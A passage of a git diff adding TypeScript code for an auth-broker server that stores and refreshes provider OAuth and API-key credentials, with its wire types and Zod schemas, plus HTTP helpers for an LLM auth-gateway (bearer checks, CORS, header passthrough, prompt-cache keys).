logger.warn("auth-broker usage fetch failed", { error: String(error) }); + return null; + }) + .finally(() => { + this.#usageInflight = undefined; + }); + this.#usageInflight = inflight; + return inflight; + } + + close(): void { + if (this.#closed) return; + this.#closed = true; + this.#backgroundAbort.abort(); + this.#cache.clear(); + } +} + +/** + * Match a broker-supplied usage report to a specific OAuth credential. The + * broker returns aggregate reports across all credentials it manages, so we + * pick the one whose identity (accountId / email / projectId) lines up with + * the credential the caller is asking about. + * + * Falls back to the lone candidate when only one matches the provider; falls + * through to `null` when nothing matches, which `AuthStorage` treats as "no + * usage data" (ranking proceeds without a usage signal for this credential). + */ +function matchUsageReport(reports: UsageReport[], provider: Provider, credential: OAuthCredential): UsageReport | null { + const candidates = reports.filter(report => report.provider === provider); + if (candidates.length === 0) return null; + if (candidates.length === 1) return candidates[0]; + const accountId = credential.accountId?.trim().toLowerCase(); + const email = credential.email?.trim().toLowerCase(); + const projectId = credential.projectId?.trim().toLowerCase(); + for (const report of candidates) { + if (reportMatchesIdentity(report, accountId, email, projectId)) return report; + } + return null; +} + +function reportMatchesIdentity( + report: UsageReport, + accountId: string | undefined, + email: string | undefined, + projectId: string | undefined, +): boolean { + const metadata = (report.metadata ?? {}) as Record<string, unknown>; + if (accountId) { + const metaAccount = readMetadataString(metadata, "accountId") ?? readMetadataString(metadata, "account_id"); + if (metaAccount && metaAccount.toLowerCase() === accountId) return true; + for (const limit of report.limits) { + if (limit.scope.accountId?.toLowerCase() === accountId) return true; + } + } + if (email) { + const metaEmail = readMetadataString(metadata, "email"); + if (metaEmail && metaEmail.toLowerCase() === email) return true; + } + if (projectId) { + const metaProject = readMetadataString(metadata, "projectId") ?? readMetadataString(metadata, "project_id"); + if (metaProject && metaProject.toLowerCase() === projectId) return true; + for (const limit of report.limits) { + if (limit.scope.projectId?.toLowerCase() === projectId) return true; + } + } + return false; +} + +function readMetadataString(metadata: Record<string, unknown>, key: string): string | undefined { + const value = metadata[key]; + return typeof value === "string" && value.trim().length > 0 ? value.trim() : undefined; +} diff --git a/packages/ai/src/auth-broker/server.ts b/packages/ai/src/auth-broker/server.ts new file mode 100644 index 000000000..e1fe23da5 --- /dev/null +++ b/packages/ai/src/auth-broker/server.ts @@ -0,0 +1,454 @@ +/** + * Auth broker HTTP server. + * + * Wraps an {@link AuthStorage} (backed by a SQLite store on the broker host) + * and exposes a minimal REST API for snapshot pulls and explicit refresh / + * disable operations. Background refresh of expiring credentials lives in + * {@link AuthBrokerRefresher}. + * + * Transport security is delegated to the operator (Tailscale / Wireguard); + * the server only checks a bearer token against an allow-list per request. + */ +import { logger } from "@oh-my-pi/pi-utils"; +import type { AuthStorage } from "../auth-storage"; +import { parseBind } from "../utils/parse-bind"; +import { AuthBrokerRefresher, type AuthBrokerRefresherSchedule } from "./refresher"; +import type { + CredentialDisableResponse, + CredentialRefreshResponse, + CredentialUploadResponse, + HealthzResponse, + RefresherSchedule, + SnapshotEntry, + SnapshotResponse, +} from "./types"; +import { DEFAULT_AUTH_BROKER_BIND, DEFAULT_REFRESH_INTERVAL_MS, DEFAULT_REFRESH_SKEW_MS } from "./types"; +import { credentialDisableRequestSchema, credentialUploadRequestSchema } from "./wire-schemas"; + +export interface AuthBrokerServerOptions { + /** Underlying credential storage (wraps the local SQLite store on the broker). */ + storage: AuthStorage; + /** Listen address; accepts `host:port` or just `port`. */ + bind?: string; + /** Accept any of these bearer tokens. Empty disables auth (loopback only). */ + bearerTokens: string[]; + /** Broker version string surfaced on `/v1/healthz`. */ + version?: string; + /** Refresh credentials expiring within this window. Default 5 min. */ + refreshSkewMs?: number; + /** Background refresh cadence. Default 60s. */ + refreshIntervalMs?: number; + /** Disable the background refresher (e.g. for tests). */ + disableRefresher?: boolean; +} + +export interface AuthBrokerServerHandle { + /** Bound URL (`http://host:port`). */ + url: string; + port: number; + hostname: string; + close(): Promise<void>; +} + +function json(status: number, body: unknown, headers?: Record<string, string>): Response { + return new Response(JSON.stringify(body), { + status, + headers: { "Content-Type": "application/json", ...(headers ?? {}) }, + }); +} + +function empty(status: number, headers?: Record<string, string>): Response { + return new Response(null, { status, headers }); +} + +function isAuthorized(req: Request, tokens: ReadonlySet<string>): boolean { + if (tokens.size === 0) return true; + const header = req.headers.get("authorization"); + if (!header) return false; + const match = header.match(/^Bearer\s+(.+)$/i); + if (!match) return false; + return tokens.has(match[1].trim()); +} + +/** + * Parse + validate a JSON request body against a Zod schema. Returns a + * `Response` (400) on parse/validation failure so handlers can early-return. + * When `allowEmpty` is set, an empty request body is validated against `{}`. + */ +async function parseBody<T>( + req: Request, + schema: { safeParse(input: unknown): { success: true; data: T } | { success: false; error: { message: string } } }, + options: { allowEmpty?: boolean } = {}, +): Promise<{ ok: true; data: T } | { ok: false; response: Response }> { + let raw: string; + try { + raw = await req.text(); + } catch (error) { + return { ok: false, response: json(400, { error: `Invalid request body: ${String(error)}` }) }; + } + if (raw.length === 0 && !options.allowEmpty) { + return { ok: false, response: json(400, { error: "Request body required" }) }; + } + let parsed: unknown; + try { + parsed = raw.length === 0 ? {} : JSON.parse(raw); + } catch (error) { + return { ok: false, response: json(400, { error: `Invalid JSON body: ${String(error)}` }) }; + } + const result = schema.safeParse(parsed); + if (!result.success) { + return { ok: false, response: json(400, { error: result.error.message }) }; + } + return { ok: true, data: result.data }; +} + +const REFRESH_ROUTE = /^\/v1\/credential\/(\d+)\/refresh$/; +const DISABLE_ROUTE = /^\/v1\/credential\/(\d+)\/disable$/; + +const MAX_SNAPSHOT_WAIT_MS = 30_000; +const DISABLED_NEXT_SWEEP_IN_MS = Number.MAX_SAFE_INTEGER; + +function snapshotHeaders(generation: number): Record<string, string> { + return { + ETag: `"${generation}"`, + "Cache-Control": "no-store", + }; +} + +function parseGenerationTag(header: string | null): number | undefined { + if (!header) return undefined; + let value = header.trim(); + if (value.startsWith("W/")) value = value.slice(2).trim(); + if (value.startsWith('"') && value.endsWith('"') && value.length >= 2) { + value = value.slice(1, -1); + } + const generation = Number(value); + if (!Number.isInteger(generation) || generation < 0) return undefined; + return generation; +} + +function parseWaitMs(url: URL): number { + const raw = url.searchParams.get("wait"); + if (raw === null) return 0; + const parsed = Number(raw); + if (!Number.isFinite(parsed)) return 0; + return Math.max(0, Math.min(MAX_SNAPSHOT_WAIT_MS, Math.trunc(parsed))); +} + +function delayResult(ms: number): { promise: Promise<"timeout">; cancel: () => void } { + const done = Promise.withResolvers<"timeout">(); + const timer = setTimeout(() => done.resolve("timeout"), ms); + timer.unref?.(); + return { + promise: done.promise, + cancel: () => clearTimeout(timer), + }; +} + +class GenerationGate { + readonly #storage: AuthStorage; + readonly #unsubscribe: () => void; + #waiters: Map<number, Set<() => void>> = new Map(); + + constructor(storage: AuthStorage) { + this.#storage = storage; + this.#unsubscribe = storage.onGenerationChanged(generation => this.#wake(generation)); + } + + waitForChange(afterGeneration: number, signal: AbortSignal): Promise<"changed" | "aborted"> { + if (this.#storage.getGeneration() !== afterGeneration) return Promise.resolve("changed"); + if (signal.aborted) return Promise.resolve("aborted"); + + const done = Promise.withResolvers<"changed" | "aborted">(); + let settled = false; + const waiters = this.#waiters.get(afterGeneration) ?? new Set<() => void>(); + this.#waiters.set(afterGeneration, waiters); + + const cleanup = (): void => { + signal.removeEventListener("abort", onAbort); + waiters.delete(resolveChanged); + if (waiters.size === 0) this.#waiters.delete(afterGeneration); + }; + const settle = (result: "changed" | "aborted"): void => { + if (settled) return; + settled = true; + cleanup(); + done.resolve(result); + }; + const resolveChanged = (): void => settle("changed"); + const onAbort = (): void => settle("aborted"); + + waiters.add(resolveChanged); + signal.addEventListener("abort", onAbort, { once: true }); + return done.promise; + } + + close(): void { + this.#unsubscribe(); + for (const waiters of this.#waiters.values()) { + for (const resolve of waiters) resolve(); + } + this.#waiters.clear(); + } + + #wake(generation: number): void { + for (const [waitingFor, waiters] of [...this.#waiters]) { + if (generation <= waitingFor) continue; + for (const resolve of [...waiters]) resolve(); + } + } +} + +function resolveRefresherSchedule( + refresher: AuthBrokerRefresher | undefined, + serverNowMs: number, +): { wire: RefresherSchedule; nextSweepAt: number } { + if (!refresher) { + return { + wire: { + enabled: false, + intervalMs: 0, + skewMs: 0, + nextSweepInMs: DISABLED_NEXT_SWEEP_IN_MS, + }, + nextSweepAt: DISABLED_NEXT_SWEEP_IN_MS, + }; + } + const schedule: AuthBrokerRefresherSchedule = refresher.getSchedule(); + return { + wire: { + enabled: schedule.enabled, + intervalMs: schedule.intervalMs, + skewMs: schedule.skewMs, + nextSweepInMs: Math.max(0, schedule.nextSweepAt - serverNowMs), + }, + nextSweepAt: schedule.nextSweepAt, + }; +} + +function computeRotatesInMs( + entry: { credential: { type: string; expires?: number } }, + schedule: RefresherSchedule, + nextSweepAt: number, + serverNowMs: number, +): number | null { + if (!schedule.enabled || entry.credential.type !== "oauth") return null; + const expires = entry.credential.expires; + if (typeof expires !== "number" || !Number.isFinite(expires)) return null; + if (!Number.isFinite(nextSweepAt) || !Number.isFinite(schedule.intervalMs) || schedule.intervalMs <= 0) return null; + + const dueAt = expires - schedule.skewMs; + const eligibleAt = Math.max(serverNowMs, dueAt); + if (dueAt <= serverNowMs && nextSweepAt <= serverNowMs) return 0; + if (nextSweepAt >= eligibleAt) return Math.max(0, nextSweepAt - serverNowMs); + const steps = Math.ceil((eligibleAt - nextSweepAt) / schedule.intervalMs); + const rotatesAt = nextSweepAt + steps * schedule.intervalMs; + return Math.max(0, rotatesAt - serverNowMs); +} + +function buildSnapshot(storage: AuthStorage, refresher: AuthBrokerRefresher | undefined): SnapshotResponse { + const serverNowMs = Date.now(); + const base = storage.exportSnapshot(); + const { wire, nextSweepAt } = resolveRefresherSchedule(refresher, serverNowMs); + const credentials: SnapshotEntry[] = base.credentials.map(entry => ({ + ...entry, + rotatesInMs: computeRotatesInMs(entry, wire, nextSweepAt, serverNowMs), + })); + return { + generation: base.generation, + generatedAt: base.generatedAt, + serverNowMs, + refresher: wire, + credentials, + }; +} + +async function serveSnapshot( + req: Request, + url: URL, + storage: AuthStorage, + gate: GenerationGate, + refresher: AuthBrokerRefresher | undefined, + peer: string, +): Promise<Response> { + await storage.reload(); + let currentGeneration = storage.getGeneration(); + const clientGeneration = parseGenerationTag(req.headers.get("if-none-match")); + const waitMs = parseWaitMs(url); + + if (clientGeneration === undefined || currentGeneration !== clientGeneration || waitMs <= 0) { + const body = buildSnapshot(storage, refresher); + logger.info("auth-broker snapshot served", { + peer, + credentials: body.credentials.length, + generation: body.generation, + }); + return json(200, body, snapshotHeaders(body.generation)); + } + + const delay = delayResult(waitMs); + const waitController = new AbortController(); + const waitSignal = AbortSignal.any([req.signal, waitController.signal]); + const result = await Promise.race([gate.waitForChange(clientGeneration, waitSignal), delay.promise]); + delay.cancel(); + waitController.abort(); + if (result === "aborted" || req.signal.aborted) return empty(499, snapshotHeaders(currentGeneration)); + + await storage.reload(); + currentGeneration = storage.getGeneration(); + if (currentGeneration !== clientGeneration) { + const body = buildSnapshot(storage, refresher); + logger.info("auth-broker snapshot long-poll changed", { + peer, + credentials: body.credentials.length, + generation: body.generation, + }); + return json(200, body, snapshotHeaders(body.generation)); + } + + logger.info("auth-broker snapshot long-poll unchanged", { peer, generation: currentGeneration }); + return empty(304, snapshotHeaders(currentGeneration)); +} + +/** Boot the broker. Caller owns lifecycle; `handle.close()` to stop. */ +export function startAuthBroker(opts: AuthBrokerServerOptions): AuthBrokerServerHandle { + const bind = parseBind(opts.bind ?? DEFAULT_AUTH_BROKER_BIND); + const tokens = new Set<string>(opts.bearerTokens); + const version = opts.version; + + const refresher = opts.disableRefresher + ? undefined + : new AuthBrokerRefresher({ + storage: opts.storage, + refreshSkewMs: opts.refreshSkewMs ?? DEFAULT_REFRESH_SKEW_MS, + refreshIntervalMs: opts.refreshIntervalMs ?? DEFAULT_REFRESH_INTERVAL_MS, + }); + refresher?.start(); + const generationGate = new GenerationGate(opts.storage); + + const server = Bun.serve({ + hostname: bind.hostname, + port: bind.port, + fetch: async (req): Promise<Response> => { + const url = new URL(req.url); + const pathname = url.pathname; + const peer = + req.headers.get("x-forwarded-for")?.split(",")[0].trim() || req.headers.get("x-real-ip") || "unknown"; + try { + if (req.method === "GET" && pathname === "/v1/healthz") { + const body: HealthzResponse = { ok: true, version }; + return json(200, body); + } + if (!isAuthorized(req, tokens)) { + logger.info("auth-broker request unauthorized", { method: req.method, path: pathname, peer }); + return json(401, { error: "unauthorized" }); + } + if (req.method === "GET" && pathname === "/v1/snapshot") { + return serveSnapshot(req, url, opts.storage, generationGate, refresher, peer); + } + if (req.method === "GET" && pathname === "/v1/usage") { + try { + // AuthStorage caches usage reports internally with a 5-minute per-credential + // TTL (USAGE_REPORT_TTL_MS) so back-to-back widget polls re-use the + // last fetch instead of hitting provider endpoints repeatedly. + // `req.signal` propagates HTTP-client disconnects all the way to the + // per-caller cancel without touching the shared upstream fetch. + const reports = (await opts.storage.fetchUsageReports?.({ signal: req.signal })) ?? []; + // Drop the `raw` field — it's the provider-specific upstream body, + // large and unstable. Everything UI-relevant lives in `limits` and + // `metadata`. + const trimmed = reports.map(({ raw: _raw, ...rest }) => rest); + logger.info("auth-broker usage served", { peer, reports: trimmed.length }); + return json(200, { generatedAt: Date.now(), reports: trimmed }); + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.warn("auth-broker usage fetch failed", { peer, error: message }); + return json(502, { error: message }); + } + } + const refreshMatch = req.method === "POST" ? pathname.match(REFRESH_ROUTE) : null; + if (refreshMatch) { + const id = Number.parseInt(refreshMatch[1], 10); + try { + const entry = await opts.storage.refreshCredentialById(id, req.signal); + const body: CredentialRefreshResponse = { entry }; + logger.info("auth-broker credential refreshed", { + id, + provider: entry.provider, + peer, + expires: entry.credential.type === "oauth" ? entry.credential.expires : undefined, + }); + return json(200, body); + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.warn("auth-broker refresh failed", { id, peer, error: message }); + const status = message.includes("No credential with id") ? 404 : 500; + return json(status, { error: message }); + } + } + const disableMatch = req.method === "POST" ? pathname.match(DISABLE_ROUTE) : null; + if (disableMatch) { + const id = Number.parseInt(disableMatch[1], 10); + const parsed = await parseBody(req, credentialDisableRequestSchema, { allowEmpty: true }); + if (!parsed.ok) return parsed.response; + const cause = + parsed.data.cause && parsed.data.cause.length > 0 ? parsed.data.cause : "disabled via auth-broker"; + const ok = opts.storage.disableCredentialById(id, cause); + if (!ok) { + logger.info("auth-broker disable miss", { id, peer, cause }); + return json(404, { error: `No credential with id=${id}` }); + } + logger.info("auth-broker credential disabled", { id, peer, cause }); + const response: CredentialDisableResponse = { ok: true }; + return json(200, response); + } + if (req.method === "POST" && pathname === "/v1/credential") { + const parsed = await parseBody(req, credentialUploadRequestSchema); + if (!parsed.ok) return parsed.response; + const { provider, credential } = parsed.data; + try { + const entries = opts.storage.upsertCredential(provider, credential); + const identity = + credential.type === "oauth" + ? (credential.email ?? credential.accountId ?? credential.projectId ?? "(no identity)") + : "(api key)"; + logger.info("auth-broker credential upserted", { + provider, + type: credential.type, + identity, + peer, + providerTotal: entries.length, + }); + const response: CredentialUploadResponse = { entries }; + return json(200, response); + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.warn("auth-broker upload failed", { provider, peer, error: message }); + return json(500, { error: message }); + } + } + return json(404, { error: `No route: ${req.method} ${pathname}` }); + } catch (error) { + logger.error("auth-broker handler crashed", { + method: req.method, + path: pathname, + error: String(error), + }); + return json(500, { error: "internal error" }); + } + }, + }); + + const boundHost = server.hostname ?? bind.hostname; + const boundPort = server.port ?? bind.port; + return { + url: `http://${boundHost}:${boundPort}`, + port: boundPort, + hostname: boundHost, + close: async () => { + refresher?.stop(); + generationGate.close(); + server.stop(true); + }, + }; +} diff --git a/packages/ai/src/auth-broker/types.ts b/packages/ai/src/auth-broker/types.ts new file mode 100644 index 000000000..5deb01c74 --- /dev/null +++ b/packages/ai/src/auth-broker/types.ts @@ -0,0 +1,84 @@ +/** + * Wire types shared between the auth-broker server and clients. + * + * The broker holds OAuth refresh tokens and exposes a redacted snapshot; + * clients use `access` tokens directly and call back to the broker when a + * credential expires or a 401 surfaces on a supposedly-fresh credential. + */ + +import type { AuthCredential, AuthCredentialSnapshot, AuthCredentialSnapshotEntry } from "../auth-storage"; +import type { UsageReport } from "../usage"; + +/** GET /v1/healthz response body. */ +export interface HealthzResponse { + ok: boolean; + version?: string; +} + +export interface RefresherSchedule { + enabled: boolean; + intervalMs: number; + skewMs: number; + nextSweepInMs: number; +} + +export type SnapshotEntry = AuthCredentialSnapshotEntry & { + rotatesInMs: number | null; +}; + +/** GET /v1/snapshot response body. */ +export interface SnapshotResponse extends Omit<AuthCredentialSnapshot, "credentials"> { + serverNowMs: number; + refresher: RefresherSchedule; + credentials: SnapshotEntry[]; +} + +/** GET /v1/usage response body — matches the local `AuthStorage.fetchUsageReports` shape. */ +export interface UsageResponse { + generatedAt: number; + reports: UsageReport[]; +} + +/** POST /v1/credential/:id/refresh response body. */ +export interface CredentialRefreshResponse { + entry: AuthCredentialSnapshotEntry; +} + +/** POST /v1/credential/:id/disable request body. */ +export interface CredentialDisableRequest { + cause: string; +} + +/** POST /v1/credential/:id/disable response body. */ +export interface CredentialDisableResponse { + ok: boolean; +} + +/** + * POST /v1/credential request body. The OAuth `refresh` must be the *real* + * refresh token (not the sentinel) — the broker is the canonical writer. + */ +export interface CredentialUploadRequest { + provider: string; + credential: AuthCredential; +} + +/** POST /v1/credential response body — redacted snapshot of the provider's rows after upsert. */ +export interface CredentialUploadResponse { + entries: AuthCredentialSnapshotEntry[]; +} + +/** + * Default bearer-protected route prefix. The broker exposes `/v1/healthz` + * unauthenticated for liveness probes; everything else requires a bearer. + */ +export const AUTH_BROKER_API_PREFIX = "/v1"; + +/** Default port when none is configured. Loopback-only, no external exposure. */ +export const DEFAULT_AUTH_BROKER_BIND = "127.0.0.1:8765"; + +/** Default broker→provider refresh skew. Refresh credentials this close to expiry. */ +export const DEFAULT_REFRESH_SKEW_MS = 5 * 60_000; + +/** Default broker refresh-loop cadence. */ +export const DEFAULT_REFRESH_INTERVAL_MS = 60_000; diff --git a/packages/ai/src/auth-broker/wire-schemas.ts b/packages/ai/src/auth-broker/wire-schemas.ts new file mode 100644 index 000000000..8fe755c5b --- /dev/null +++ b/packages/ai/src/auth-broker/wire-schemas.ts @@ -0,0 +1,162 @@ +/** + * Zod schemas for the auth-broker wire protocol. + * + * Shared between the server (validates inbound request bodies) and the client + * (validates responses from the broker). Schemas mirror the TypeScript types + * in `./types.ts` 1:1; the types remain the source of truth for static typing, + * and `z.infer<typeof Schema>` is asserted-compatible with them where possible. + * + * Schemas use `.strict()` on objects with a closed set of fields so unknown + * keys are rejected — the previous implementation used a hand-rolled + * `hasOnlyFields` allowlist for the same effect. + */ +import * as z from "zod/v4"; +import { REMOTE_REFRESH_SENTINEL } from "../auth-storage"; +import { usageReportSchema } from "../usage"; + +// ─── Credential payloads ─────────────────────────────────────────────────── + +/** Real OAuth credential (broker-side) — refresh token is the actual upstream value. */ +export const oauthCredentialSchema = z + .object({ + type: z.literal("oauth"), + refresh: z + .string() + .min(1) + // Reject the sentinel literal on writes: if a client somehow round-trips + // a snapshot back into POST /v1/credential, accepting the sentinel as a + // real refresh token would silently break that credential's refresh + // forever (the broker would store `"__remote__"` and try to use it as + // the upstream refresh token). + .refine(value => value !== REMOTE_REFRESH_SENTINEL, { + message: `refresh token must not equal the remote sentinel (${REMOTE_REFRESH_SENTINEL})`, + }), + access: z.string().min(1), + expires: z.number(), + enterpriseUrl: z.string().optional(), + projectId: z.string().optional(), + email: z.string().optional(), + accountId: z.string().optional(), + }) + .strict(); + +/** OAuth credential as it appears in broker snapshots — refresh replaced with sentinel. */ +export const remoteOauthCredentialSchema = oauthCredentialSchema.extend({ + refresh: z.literal(REMOTE_REFRESH_SENTINEL), +}); + +export const apiKeyCredentialSchema = z + .object({ + type: z.literal("api_key"), + key: z.string().min(1), + }) + .strict(); + +/** Discriminated union accepted on POST /v1/credential (writes). */ +export const writableAuthCredentialSchema = z.discriminatedUnion("type", [ + oauthCredentialSchema, + apiKeyCredentialSchema, +]); + +/** Discriminated union returned in snapshots (refresh is sentinel for OAuth). */ +export const snapshotCredentialSchema = z.discriminatedUnion("type", [ + remoteOauthCredentialSchema, + apiKeyCredentialSchema, +]); + +// ─── Snapshot ────────────────────────────────────────────────────────────── + +export const credentialSnapshotEntrySchema = z + .object({ + id: z.number().int(), + provider: z.string().min(1), + credential: snapshotCredentialSchema, + identityKey: z.string().nullable(), + }) + .strict(); + +export const snapshotEntrySchema = credentialSnapshotEntrySchema + .extend({ + rotatesInMs: z.number().nullable(), + }) + .strict(); + +export const refresherScheduleSchema = z + .object({ + enabled: z.boolean(), + intervalMs: z.number(), + skewMs: z.number(), + nextSweepInMs: z.number(), + }) + .strict(); + +export const snapshotResponseSchema = z + .object({ + generation: z.number().int(), + generatedAt: z.number(), + serverNowMs: z.number(), + refresher: refresherScheduleSchema, + credentials: z.array(snapshotEntrySchema), + }) + .strict(); + +// ─── Healthz ──────────────────────────────────────────────────────────────── + +export const healthzResponseSchema = z + .object({ + ok: z.boolean(), + version: z.string().optional(), + }) + .strict(); + +// ─── Usage ───────────────────────────────────────────────────────────────── + +/** + * Broker `/v1/usage` response. Reports are full {@link UsageReport}s minus the + * heavy provider-specific `raw` field (the server strips it before send) — we + * keep `raw` optional in the underlying schema so a misconfigured broker that + * forgot to strip still validates. + */ +export const usageResponseSchema = z + .object({ + generatedAt: z.number(), + reports: z.array(usageReportSchema), + }) + .strict(); + +// ─── Refresh ─────────────────────────────────────────────────────────────── + +export const credentialRefreshResponseSchema = z + .object({ + entry: credentialSnapshotEntrySchema, + }) + .strict(); + +// ─── Disable ─────────────────────────────────────────────────────────────── + +export const credentialDisableRequestSchema = z + .object({ + cause: z.string().optional(), + }) + .strict(); + +export const credentialDisableResponseSchema = z + .object({ + ok: z.boolean(), + }) + .strict(); + +// ─── Upload ──────────────────────────────────────────────────────────────── + +export const credentialUploadRequestSchema = z + .object({ + provider: z.string().min(1), + credential: writableAuthCredentialSchema, + }) + .strict(); + +export const credentialUploadResponseSchema = z + .object({ + entries: z.array(credentialSnapshotEntrySchema), + }) + .strict(); diff --git a/packages/ai/src/auth-gateway/http.ts b/packages/ai/src/auth-gateway/http.ts new file mode 100644 index 000000000..3e79e56c0 --- /dev/null +++ b/packages/ai/src/auth-gateway/http.ts @@ -0,0 +1,194 @@ +/** + * Shared HTTP helpers for the auth-gateway routes. + * + * Centralized so we share the same JSON shape, auth check, + * and peer-resolution logic. + */ +import { timingSafeEqual as nodeTimingSafeEqual } from "node:crypto"; + +const JSON_HEADERS = { + "Content-Type": "application/json", + "X-Content-Type-Options": "nosniff", +} as const; + +export function json(status: number, body: unknown): Response { + return new Response(JSON.stringify(body) ?? "null", { + status, + headers: JSON_HEADERS, + }); +} + +export function resolvePeer(req: Request): string { + const fwd = req.headers.get("x-forwarded-for"); + if (fwd) return fwd.split(",")[0].trim(); + return req.headers.get("x-real-ip") ?? "unknown"; +} + +/** + * Constant-time byte comparison. Falls back to a manual XOR accumulator if + * `node:crypto.timingSafeEqual` isn't available. Always processes every byte + * of the longer input so length itself doesn't leak via timing. + */ +export function timingSafeEqual(a: Uint8Array, b: Uint8Array): boolean { + if (a.length === b.length && typeof nodeTimingSafeEqual === "function") { + return nodeTimingSafeEqual(a, b); + } + const len = Math.max(a.length, b.length); + let diff = a.length ^ b.length; + for (let i = 0; i < len; i++) { + // Out-of-range reads return undefined → coerce to 0 via `| 0`. + const av = (i < a.length ? a[i] : 0) | 0; + const bv = (i < b.length ? b[i] : 0) | 0; + diff |= av ^ bv; + } + return diff === 0; +} + +const TOKEN_ENCODER = new TextEncoder(); + +export function isAuthorized(req: Request, tokens: ReadonlySet<string>): boolean { + if (tokens.size === 0) return true; + const header = req.headers.get("authorization"); + if (!header) return false; + const match = header.match(/^Bearer\s+(.+)$/i); + if (!match) return false; + const presented = TOKEN_ENCODER.encode(match[1].trim()); + // Iterate every allowed token regardless of early hits so the result + // timing reflects the full set, not the position of the match. + let ok = false; + for (const tok of tokens) { + const expected = TOKEN_ENCODER.encode(tok); + if (timingSafeEqual(presented, expected)) ok = true; + } + return ok; +} + +/** + * Allow-list of inbound request headers that the gateway captures and forwards + * to the underlying parsers (which decide whether to surface them to the + * provider). Case-insensitive; `x-stainless-` is a prefix match. + */ +const PASSTHROUGH_HEADER_NAMES: Record<string, true> = { + "anthropic-beta": true, + "anthropic-version": true, + "openai-organization": true, + "openai-project": true, + "openai-beta": true, + // Codex / ChatGPT-OAuth backend headers (see openai-codex/constants.ts). + // `session_id` and `conversation_id` thread the upstream session so prompt + // caching and per-conversation rate limiting work; `chatgpt-account-id` and + // `originator` identify the calling account and client surface. + "chatgpt-account-id": true, + originator: true, + session_id: true, + conversation_id: true, + // Vendor-neutral cache-identity headers. The gateway also reads these to + // populate `options.promptCacheKey` (see `resolvePromptCacheKey` below) + // so explicit client hints win over the derived fallback. + "x-prompt-cache-key": true, + "x-session-id": true, + "x-conversation-id": true, +}; + +/** + * Extract allow-listed passthrough headers from an inbound request. Keys are + * lowercased; empty values are dropped. Called once per request in + * `handleFormatEndpoint`; parsers then read `options.headers`. + */ +export function captureRequestHeaders(headers: Headers): Record<string, string> { + const out: Record<string, string> = {}; + headers.forEach((value, key) => { + if (!value) return; + const lower = key.toLowerCase(); + if (PASSTHROUGH_HEADER_NAMES[lower] || lower.startsWith("x-stainless-")) { + out[lower] = value; + } + }); + return out; +} + +/** + * Priority order for resolving a client-supplied prompt-cache identity. The + * first non-empty value wins. When none are present, the gateway derives a + * stable UUID from the request's stable parts. + */ +const CACHE_KEY_HEADERS: readonly string[] = [ + "x-prompt-cache-key", + "session_id", + "conversation_id", + "x-session-id", + "x-conversation-id", +]; + +function readBodyCacheKey(body: unknown): string | undefined { + if (body === null || typeof body !== "object") return undefined; + const root = body as Record<string, unknown>; + // Explicit body fields (OpenAI Responses / Chat). + const direct = root.prompt_cache_key; + if (typeof direct === "string" && direct.length > 0) return direct; + // Nested `metadata` (Codex CLI / Anthropic clients that route a session + // identifier through the metadata bag). + const metadata = root.metadata; + if (metadata === null || typeof metadata !== "object") return undefined; + const meta = metadata as Record<string, unknown>; + for (const field of ["prompt_cache_key", "session_id", "conversation_id"] as const) { + const v = meta[field]; + if (typeof v === "string" && v.length > 0) return v; + } + return undefined; +} + +/** + * Resolve a prompt-cache identity from inbound request body + headers. + * Order of precedence (first wins): + * 1. Body `prompt_cache_key` + * 2. Body `metadata.{prompt_cache_key,session_id,conversation_id}` + * 3. Header `x-prompt-cache-key` + * 4. Header `session_id` / `conversation_id` (Codex / ChatGPT-OAuth surface) + * 5. Header `x-session-id` / `x-conversation-id` (common informal) + * Returns undefined when none present; the gateway then derives a stable + * UUID from the request's stable parts. + */ +export function resolvePromptCacheKey(body: unknown, headers?: Headers): string | undefined { + const fromBody = readBodyCacheKey(body); + if (fromBody) return fromBody; + if (!headers) return undefined; + for (const name of CACHE_KEY_HEADERS) { + const v = headers.get(name); + if (v && v.length > 0) return v; + } + return undefined; +} + +const CORS_HEADERS: Record<string, string> = { + "Access-Control-Allow-Origin": "*", + "Access-Control-Allow-Methods": "GET, POST, OPTIONS", + "Access-Control-Allow-Headers": + "authorization, content-type, anthropic-version, anthropic-beta, openai-organization, openai-project, x-stainless-*, x-api-key", + "Access-Control-Max-Age": "86400", +}; + +/** + * CORS headers for the auth-gateway. Currently echoes a wildcard origin; the + * request is accepted so future tightening can mirror `Origin` without + * threading the request through every caller. + */ +export function corsHeaders(_req: Request): Record<string, string> { + return { ...CORS_HEADERS }; +} + +/** + * Re-emit `response` with CORS headers merged. The original response body is + * passed through unchanged. Used by the gateway wrapper so every outbound + * format-endpoint response carries the same CORS surface as the preflight. + */ +export function withCors(response: Response, req: Request): Response { + const headers = new Headers(response.headers); + const cors = corsHeaders(req); + for (const k in cors) headers.set(k, cors[k]); + return new Response(response.body, { + status: response.status, + statusText: response.statusText, + headers, + }); +} diff --git a/packages/ai/src/auth-gateway/index.ts b/packages/ai/src/auth-gateway/index.ts new file mode 100644 index 000000000..e16648ed0 --- /dev/null +++ b/packages/ai/src/auth-gateway/index.ts @@ -0,0 +1,3 @@ +export * from "./http"; +export * from "./server"; +export * from "./types"; diff --git a/packages/ai/src/auth-gateway/server.ts b/packages/ai/src/auth-gateway/server.ts new file mode 100644 index 000000000..3b713f7a4 --- /dev/null +++ b/packages/ai/src/auth-gateway/server.ts @@ -0,0 +1,651 @@ +/** + * omp auth-gateway HTTP server. + * + * Accepts any provider-format request (OpenAI chat-completions, Anthropic + * messages, OpenAI Responses) and dispatches through pi-ai's `streamSimple()` + * — which handles credential injection, anthropic-beta headers, codex + * websocket transport, and all the per-provider intricacies. The gateway is + * pure protocol translation: foreign wire → omp Context → pi-ai stream() → + * omp events → foreign wire. + * + * Endpoints: + * GET /healthz → unauth; ok + version + * GET /v1/usage → aggregated provider usage (5-min per-credential cache via AuthStorage) + * GET /v1/models → list known models from the registry + * POST /v1/chat/completions → OpenAI chat-completions in/out + * POST /v1/messages → Anthropic messages in/out + * POST /v1/responses → OpenAI Responses in/out + */ +import { logger } from "@oh-my-pi/pi-utils"; +import type { AuthStorage } from "../auth-storage"; +import { Effort } from "../model-thinking"; +import * as anthropicMessages from "../providers/anthropic-messages-server"; +import * as openaiChat from "../providers/openai-chat-server"; +import * as openaiResponses from "../providers/openai-responses-server"; +import * as piNative from "../providers/pi-native-server"; +import { streamSimple } from "../stream"; +import type { Api, AssistantMessageEventStream, Context, Model, SimpleStreamOptions } from "../types"; +import { parseBind } from "../utils/parse-bind"; +import { captureRequestHeaders, 